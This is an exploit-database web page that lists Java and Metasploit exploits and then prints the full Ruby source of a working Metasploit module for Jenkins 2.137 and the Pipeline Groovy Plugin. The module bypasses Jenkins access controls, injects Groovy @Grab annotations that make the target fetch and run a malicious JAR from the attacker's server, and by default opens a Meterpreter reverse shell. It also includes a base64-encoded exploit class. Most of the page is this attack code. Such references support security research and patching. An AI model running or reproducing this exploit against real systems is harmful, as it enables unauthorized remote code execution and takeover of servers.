Menu

Improved exploit search engine. Try it out

"Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)"

Author

Metasploit

Platform

java

Release date

2019-03-19

Release Date Title Type Platform Author
2019-04-08 "ManageEngine ServiceDesk Plus 9.3 - User Enumeration" webapps java "Alexander Bluestein"
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2016-12-20 "Java Debug Wire Protocol (JDWP) - Remote Code Execution" remote java IOactive
2019-02-25 "Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution" webapps java wetw0rk
2019-02-19 "Jenkins - Remote Code Execution" webapps java orange
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions" dos java "Google Security Research"
2019-02-18 "Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour" dos java "Google Security Research"
2019-02-05 "OpenMRS Platform < 2.24.0 - Insecure Object Deserialization" webapps java "Bishop Fox"
2019-01-28 "Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting" webapps java "Ishaq Mohammed"
2018-11-30 "Apache Spark - Unauthenticated Command Execution (Metasploit)" remote java Metasploit
2018-11-14 "Atlassian Jira - Authenticated Upload Code Execution (Metasploit)" remote java Metasploit
2018-10-24 "Apache OFBiz 16.11.04 - XML External Entity Injection" webapps java "Jamie Parfet"
2018-10-22 "Oracle Siebel CRM 8.1.1 - CSV Injection" webapps java "Sarath Nair"
2018-10-01 "ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
2018-10-01 "H2 Database 1.4.196 - Remote Code Execution" webapps java h4ckNinja
2018-09-27 "ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
2018-08-06 "Wavemaker Studio 6.6 - Server-Side Request Forgery" webapps java "Gionathan Reale"
2018-08-06 "LAMS < 3.1 - Cross-Site Scripting" webapps java "Nikola Kojic"
2018-07-16 "Fortify Software Security Center (SSC) 17.x/18.1 - XML External Entity Injection" webapps java alt3kx
2018-07-04 "ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution" webapps java "Kacper Szurek"
2018-06-20 "MaDDash 2.0.2 - Directory Listing" webapps java ManhNho
2018-06-26 "Liferay Portal < 7.0.4 - Server-Side Request Forgery" webapps java "Mehmet Ince"
2018-06-04 "SearchBlox 8.6.7 - XML External Entity Injection" webapps java "Ahmet Gurel"
2018-05-30 "SearchBlox 8.6.6 - Cross-Site Request Forgery" webapps java "Ahmet Gurel"
2018-05-22 "ERPnext 11 - Cross-Site Scripting" webapps java "Veerababu Penugonda"
2018-05-21 "ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting" webapps java "Ahmet Gurel"
2018-05-21 "GitBucket 4.23.1 - Remote Code Execution" webapps java "Kacper Szurek"
2018-05-16 "RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting" webapps java "SEC Consult"
Release Date Title Type Platform Author
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
2019-04-15 "Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-12 "Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)" local windows Metasploit
2019-04-05 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)" remote php Metasploit
2019-04-03 "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-03-28 "Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)" remote multiple Metasploit
2019-03-28 "CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)" remote php Metasploit
2019-03-19 "Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)" remote java Metasploit
2019-03-18 "BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)" remote multiple Metasploit
2019-03-13 "elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)" remote php Metasploit
2019-03-07 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)" remote php Metasploit
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-07 "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)" local freebsd_x86-64 Metasploit
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-11 "NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)" remote php Metasploit
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
2019-02-11 "Evince - CBT File Command Injection (Metasploit)" local linux Metasploit
2019-01-24 "AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-16 "blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-02 "Hashicorp Consul - Remote Command Execution via Services API (Metasploit)" remote linux Metasploit
2019-01-02 "Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)" remote linux Metasploit
2018-12-20 "Erlang - Port Mapper Daemon Cookie RCE (Metasploit)" remote multiple Metasploit
2018-12-14 "Safari - Proxy Object Type Confusion (Metasploit)" remote macos Metasploit
2018-12-13 "CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)" local windows Metasploit
2018-12-04 "HP Intelligent Management - Java Deserialization RCE (Metasploit)" remote windows Metasploit
2018-12-04 "Emacs - movemail Privilege Escalation (Metasploit)" local unix Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46572/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46572/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46572/41013/jenkins-2137-and-pipeline-groovy-plugin-261-acl-bypass-and-metaprogramming-rce-metasploit/download/", "exploit_id": "46572", "exploit_description": "\"Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)\"", "exploit_date": "2019-03-19", "exploit_author": "Metasploit", "exploit_type": "remote", "exploit_platform": "java", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Jenkins ACL Bypass and Metaprogramming RCE',
      'Description'    => %q{
        This module exploits a vulnerability in Jenkins dynamic routing to
        bypass the Overall/Read ACL and leverage Groovy metaprogramming to
        download and execute a malicious JAR file.

        The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work
        on later versions of Jenkins.

        Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.
      },
      'Author'         => [
        'Orange Tsai', # Discovery and PoC
        'wvu'          # Metasploit module
      ],
      'References'     => [
        ['CVE', '2019-1003000'], # Script Security
        ['CVE', '2019-1003001'], # Pipeline: Groovy
        ['CVE', '2019-1003002'], # Pipeline: Declarative
        ['EDB', '46427'],
        ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
        ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
        ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html'],
        ['URL', 'https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc']
      ],
      'DisclosureDate' => '2019-01-08', # Public disclosure
      'License'        => MSF_LICENSE,
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      'Targets'        => [
        ['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)',
          'Version'    => Gem::Version.new('2.137')
        ]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_https'},
      'Notes'          => {
        'Stability'    => [CRASH_SAFE],
        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
        'Reliability'  => [REPEATABLE_SESSION]
      },
      'Stance'         => Stance::Aggressive # Be aggressive, b-e aggressive!
    ))

    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Base path to Jenkins', '/'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])

    deregister_options('URIPATH')
  end

=begin
  http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]
=end
  def check
    checkcode = CheckCode::Safe

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => go_go_gadget1('/search/index'),
      'vars_get' => {'q' => 'a'}
    )

    unless res && (version = res.headers['X-Jenkins'])
      vprint_error('Jenkins not detected')
      return CheckCode::Unknown
    end

    vprint_status("Jenkins #{version} detected")
    checkcode = CheckCode::Detected

    if Gem::Version.new(version) > target['Version']
      vprint_error("Jenkins #{version} is not a supported target")
      return CheckCode::Safe
    end

    vprint_good("Jenkins #{version} is a supported target")
    checkcode = CheckCode::Appears

    if res.body.include?('Administrator')
      vprint_good('ACL bypass successful')
      checkcode = CheckCode::Vulnerable
    else
      vprint_error('ACL bypass unsuccessful')
      return CheckCode::Safe
    end

    checkcode
  end

  def exploit
    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    # NOTE: Jenkins/Groovy/Ivy uses HTTP unconditionally, so we can't use HTTPS
    # HACK: Both HttpClient and HttpServer use datastore['SSL']
    ssl = datastore['SSL']
    datastore['SSL'] = false
    start_service('Path' => '/')
    datastore['SSL'] = ssl

    print_status('Sending Jenkins and Groovy go-go-gadgets')
    send_request_cgi(
      'method'   => 'GET',
      'uri'      => go_go_gadget1,
      'vars_get' => {'value' => go_go_gadget2}
    )
  end

  #
  # Exploit methods
  #

=begin
  http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
  ?apiUrl=http://169.254.169.254/%23
  &login=orange
  &password=tsai
=end
  def go_go_gadget1(custom_uri = nil)
    # NOTE: See CVE-2018-1000408 for why we don't want to randomize the username
    acl_bypass = normalize_uri(target_uri.path, '/securityRealm/user/admin')

    return normalize_uri(acl_bypass, custom_uri) if custom_uri

    normalize_uri(
      acl_bypass,
      '/descriptorByName',
      '/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
    )
  end

=begin
  http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
  ?value=
  @GrabConfig(disableChecksums=true)%0a
  @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a
  @Grab(group='tw.orange', module='poc', version='1')%0a
  import Orange;
=end
  def go_go_gadget2
    (
      <<~EOF
        @GrabConfig(disableChecksums=true)
        @GrabResolver('http://#{srvhost_addr}:#{srvport}/')
        @Grab('#{vendor}:#{app}:#{version}')
        import #{app}
      EOF
    ).strip
  end

  #
  # Payload methods
  #

  #
  # If you deviate from the following sequence, you will suffer!
  #
  # HEAD /path/to/pom.xml     -> 404
  # HEAD /path/to/payload.jar -> 200
  # GET  /path/to/payload.jar -> 200
  #
  def on_request_uri(cli, request)
    vprint_status("#{request.method} #{request.uri} requested")

    unless %w[HEAD GET].include?(request.method)
      vprint_error("Ignoring #{request.method} request")
      return
    end

    if request.method == 'HEAD'
      if request.uri != payload_uri
        vprint_error('Sending 404')
        return send_not_found(cli)
      end

      vprint_good('Sending 200')
      return send_response(cli, '')
    end

    if request.uri != payload_uri
      vprint_error('Sending bogus file')
      return send_response(cli, "#{Faker::Hacker.say_something_smart}\n")
    end

    vprint_good('Sending payload JAR')
    send_response(
      cli,
      payload_jar,
      'Content-Type' => 'application/java-archive'
    )

    # XXX: $HOME may not work in some cases
    register_dir_for_cleanup("$HOME/.groovy/grapes/#{vendor}")
  end

  def payload_jar
    jar = payload.encoded_jar

    jar.add_file("#{app}.class", exploit_class)
    jar.add_file(
      'META-INF/services/org.codehaus.groovy.plugins.Runners',
      "#{app}\n"
    )

    jar.pack
  end

=begin javac Exploit.java
  import metasploit.Payload;

  public class Exploit {
      public Exploit(){
          try {
              Payload.main(null);
          } catch (Exception e) { }

      }
  }
=end
  def exploit_class
    klass = Rex::Text.decode_base64(
      <<~EOF
        yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB
        AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq
        YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl
        Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n
        L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q
        twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL
        AAAA
      EOF
    )

    # Replace length-prefixed string "Exploit" with a random one
    klass.sub(/.Exploit/, "#{[app.length].pack('C')}#{app}")
  end

  #
  # Utility methods
  #

  def payload_uri
    "/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar"
  end

  def vendor
    @vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join
  end

  def app
    @app ||= Faker::App.name.split(/[^[:alpha:]]/).join
  end

  def version
    @version ||= Faker::App.semantic_version
  end

end